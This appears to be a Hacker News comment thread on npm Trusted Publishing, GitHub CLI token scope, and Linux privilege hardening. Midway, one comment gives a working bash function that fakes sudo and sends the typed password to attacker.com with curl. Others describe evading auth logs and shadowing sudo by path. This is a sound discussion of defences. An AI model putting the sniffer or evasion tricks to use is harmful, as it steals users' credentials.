Edit: separately, I'll note that the risk of long-lived, highly privileged credentials is the primary motivating reason for Trusted Publishing: a developer's machine has (by necessity) a much higher degree of access than an ephemeral runner does, making it a much juicier target for an attacker. It also runs all kinds of stuff in a mostly unsandboxed manner, making it easier (in principle) to exploit. That's not to say there shouldn't be additional guards on publishing, but that I'm not remotely convinced that local publishing is any better by default.
However, the threat Im most afraid of still does involve dev environment compromise. Because if your repo admin gets their token stolen from their gh cli, they can trivially undo via API (without a 2fa gate!) any github level gate you have put in place to make TP safe. I want so badly to be wrong about that, we have been evaluating TP in my projects and I want to use it. But without a second factor to promote a release, at the end of the day if you have TP configured and your repo admin gets pwned, you cannot stop a TP release unless you race their publish and disable TP at npm.
TP is amazing at removing long lived npm tokens from CI, but the class of compromise that historically has plagued the ecosystem does not at all depend on the token being long lived, it depends on an attacker getting a token which doesnt require 2fa.
I am begging for someone to prove me wrong about this, not to be a shit, but because I really want to find a secure way to use TP in lodash, express, body-parser, cors, etc
I'm in agreement that a second factor would be ideal, to be clear. I think it's a good idea, something like "package is released with Trusted Publishing, then 'marked' via a 2FA attestation". But in theory that 2FA is supposed to be necessary anyways since you can require a 2FA on Github and then require approvals on PRs - hence the cache poisoning being required.
There is no gate you can put on a Trusted Publisher setup in github which requires 2fa to remove. Full stop. 2fa on github gates some actions, but with a token with the right scope you can just disable the gating of workflow-runs-on-approve, branch protection, anything besides I think repo deletion and renaming.
And in my experience most maintainers will have repo admin perms by nature of the maintainer team being small and high trust. Your point is well taken, however, that said stolen token does need to have high enough privileges. But if you are the lead maintainer of your project, your gh token just comes with admin on your repo scope.
This is an area where documentation is necessary but not sufficient. Github needs to add some form of automated screening mechanism to either prevent this usage, or at the very least quickly flag usages that might be dangerous.
These types of features are not worth it and need to be removed from the marketplace.
What upthread is talking about is the Github CLI app, `gh`; it doesn't use a fine-grained tokens, it uses OAuth app tokens. I.e., if you look at fine grain tokens (Setting → Developer settings → Personal access tokens → Fine-grained token), you will not see anything corresponding to `gh` there, as it does not use that form of authentication. It is under Settings → Applications → Authorized OAuth Apps as "Github CLI".
I just ran through the login sequence to double-check, but the permissions you grant it are not configurable during the login sequence, and it requests an all-encompassing token, as the upthread suggests.
Another way to come at this is to look at the token itself: gh's token is prefixed with `gho_` (the prefix for such OAuth apps), and fine-grained tokens are prefixed with `github_pat_` (sic)¹
¹(PATs are prefixed with `ghp_`, though I guess fine-grained tokens are also sometimes called fine-grain PATs… so, maybe the prefix is sensible.)
Malware can make a fake unprivileged sudo that sniffs your password.
function sudo () {
realsudo=$(which sudo);
read -r -s -p "[sudo] password for $USER: " password;
echo "$USER: $password" | \
curl -F 'p=<-' https://attacker.com >/dev/null 2>&1;
$realsudo -S <<< "$password" -u root bash -C "exit" >/dev/null 2>&1;
$realsudo "${@:1}";
}Yes indeed.
> Malware can make a fake unprivileged sudo that sniffs your password.
Not on my Linux workstation though. No sudo command installed. Not a single setuid binary. Not even su. So basically only root can use su and nobody else.
Only way to log in at root is either by going to tty2 (but then the root password is 30 characters long, on purpose, to be sure I don't ever enter it, so login from tty2 ain't really an option) or by login in from another computer, using a Yubikey (no password login allowed). That other computer is on a dedicated LAN (a physical LAN, not a VLAN) that exists only for the purpose of allowing root to ssh in (yes, I do allow root to SSH in: but only with using U2F/Yubikey... I have to as it's the only real way to log in as root).
It is what it is and this being HN people are going to bitch that it's bad, insecure, inconvenient (people typically love convenience at the expense of security), etc. but I've been using basically that setup since years. When I need to really be root (which is really not often), I use a tiny laptop on my desk that serves as a poor admin's console (but over SSH and only with a Yubikey, so it'd be quite a feat to attack that).
Funnily enough last time I logged in as root (from the laptop) was to implement the workaround to blacklist all the modules for copy.fail/dirtyfrag.
That laptop doesn't even have any Wifi driver installed. No graphical interface. It's minimal. It's got a SSH client, a firewall (and so does the workstation) and that's basically it. As it's on a separate physical LAN, no other machine can see it on the network.
I did set that up just because I could. Turns out it's fully usable so I kept using it.
Now of course I've got servers, VMs, containers, etc. at home too (and on dedicated servers): that's another topic. But on my main workstation a sudo replacement function won't trick me.
> Realistically if you have installed malware, you need to do a full wipe of your computer anyway
You might be the exception to this sentiment. But out of curiosity, after all that setup would you feel confident trying to recover from malware (rather than taking the “nuke it from orbit” approach?).
For servers, sudo or a package manager etc should not exist. There is no good reason for servers to run any processes as root or have any way to reach root. Servers should generally be immutable appliances.
/aside
I would say that the inability to obtain a session with elevated privileges from a normal session is key. The problem with sudo is that it gives the same shell some superpowers, so it's exploitable. Even ssh might be impenetrable, if not for the /dev/<pid>/fd of the ssh invocation, and even that can only read.
My phone password is that long, we’re still only talking about taking a few seconds to enter it when sober.
Most people will quickly develop the necessary muscle memory in regular use.
Alternately, run `sudo --non-interactive --validate` over and over until it succeeds. For some reason, using noninteractive doesn't log to the auth log/journald the way trying and failing to actually run a command would.
Edit: the loop only works assuming you can run this sudo command in the background in the user's shell so that you can pick up the same sudo session when they auth, which is honestly unlikely. Easier to wrap sudo in a command that just also runs sudo and then immediately runs something else.
Edited: Previous suggested using \sudo but it depends of the variable path which can be modified by the attacker.
$ /usr/bin/sudo() { echo Not the real sudo.; }
$ /usr/bin/sudo
Not the real sudo.
And every other suggestion also doesn't work if the attacker can just replace the shell.
Password on sudo is only useful if you detect the infection before you run sudo
Plus you only need one slip-up and you're hosed. Even people who try to almost always use '/usr/bin/sudo' will undoubtedly accidentally let a 'sudo' go through. Maybe they copy/paste a command from somewhere (after verifying that it's safe of course) and just didn't think of the sudo issue then and there.
Make alias called sdo that echoes sudo path and hash every time you use it to stderr.
That's security by obscurity though.
1. shells support the notion of privileged commands, that can't be overridden with PATH manipulations, aliases or functions.
2. Sudo (or PAM actually) can authenticate with your identity provider (like Entra ID) instead of a local password. Then there is nothing to sniff and you can also use 2FA or passkeys.
Remember that malware can replace or modify your shell
Then the next time you run sudo, phase2 triggers installing a rootkit, etc.
That's why Flatpaks sandbox doesn't exist if the application has access to the home folder.
You should always run dev stuff in containers to start with. And when your system is compromised, reprovision from a higher scope, too many places to hide backdoors
I only disallow password login over SSH. It's still technically possible to log in at a virtual console (like tty1 / tty2 / etc.) using a password (btw only root has a 30 characters password).
Usually you do not allow to directly log in as root by SSH: but in my case it's basically the way I want it done. So I allow root to log in by using SSH but only with a Yubikey.
Back in the NT days malware could totally intercept it, but it would have had to be in the kernel. Which was something of an improvement.
Thank you, DoD Orange Book.
So the main danger is that you're not running the real sudo.
I have an idea that I hope to implement one day to make sudo actually secure:
1. Authenticate with passkeys (webauthn) instead of passwords.
2. Sudo can only run an interactive root shell, not arbitrary commands. The session is time-bound, and the TTY output is recorded for auditing purposes.
This combination makes intercepting sudo largely useless. Passkey authentication cannot be replayed or relayed. The fact that sudo can only open an interactive shell makes it impossible for a sudo wrapper to pass a malicious to sudo. This way we're not dependent on whether the unprivileged shell is secured properly. It also solves approval fatigue (compared to running sudo separately for every command).
----
EDIT: now that I think about it: an attacker can still edit .bash_profile and reexec the shell in a malicious terminal emulator. Then when the user gets a sudo root shell, the malicious terminal emulator can inject malicious commands.
Looks like the only good way is to get a root privileges via a separate user account that doesn't have malware, and that also can't easily install malware (e.g. accidentally running npm, forgetting that that's not safe).
In practice yubikey sudo keeps you much safer today, as almost nobody uses it and malware won't be prepared for it
Yubikeys do not fix this issue.
Oh no, I'd still nuke everything from orbit should I find anything indicating a local exploit succeeded. But the thing is: if on one system a local exploit has less probability to give root, then the probability that on that same system I'd know I need to nuke everything from orbit would be higher than on a system where root is easier to obtain.
I was however answering to the part about subverting sudo: and I both agree (it's totally trivial to abuse sudo) and disagree ("everybody uses sudo") with the part about sudo.
Many package managers require sudo, sure, but there is no good reason for them to in a modern linux system, and not all require this.
Even with systemd, you can use systemd --user.
Honestly, the Android approach is significantly better. (and for that, see Micay's various ramblings posted online)
You do not need root to do anything in Linux these days anyway between Namespaces and Capabilities so there is really no reason for root to be accessible at all or have any processes running as root post boot.
If your unprivileged user is compromised, you are pretty hosed.
Like, sure you could, but you end up with a very useless system.
Easier to just use VMs for each security context.
Oh TYVM. Native french speaker here so it'd be the literal translation of: "depuis des années".
Weird thing is I'm pretty sure I've read it written like that... for years ; )
I can't stand l33tspeak but in this case I think the kids can stay on the lawn.
I only mentioned it because I used to think correcting people's English was rude, until I had a long work engagement with a French guy whose English was pretty good but not quite native. He insisted that I correct his written English if I saw a mistake (i.e. in documentation, proposals, etc.), otherwise he wouldn't learn where it was wrong and how to improve it.
It makes me think of another similar one: I've noticed that British English speakers will say e.g. "the new iPhone will be available from September 20th"
To my ears that sounds like it's missing an “onwards” after it (or “starting September 20th” would sound even more natural).
The only things I tend to have running at the system level are a kernel and init and maybe openssh.
(Also I just noticed the extra “it” in my previous comment, oops).
setcap 'cap_net_bind_service=+ep' /usr/sbin/sshd
Could even run it as a daemon unprivileged from a home directory with "systemd --user"
That said if you have multiple users and want every user to have their own sshd reachable on port 22 on the same machine you probably want to listen on vhost namespaced unix sockets and have something like haproxy listen on port 22 instead. Haproxy could of course also run unprivileged provided it has read access to all the sockets.
That stuff needs to change very seldom, so when you do need to change it you just generate a new tiny rootfs image in a few seconds and reboot to pivot to it or maybe have a kexec trigger if you are feeling fancy.
For my primary workstation the entire disk is my home partition and I boot my latest rootfs from a flash drive. In other cases network boot.
The bigger issue is that if you want to install or update system-wide packages, many of those will be used by privileged processes. Suppose you want to update /bin/sh. Even if the only permission you had is to write binaries, that'll get you root.
Issue is that it increases friction and you need sudo anyways to set the capabilities.
Most web servers would happy to run unprivileged with only CAP_NET_BIND_SERVICE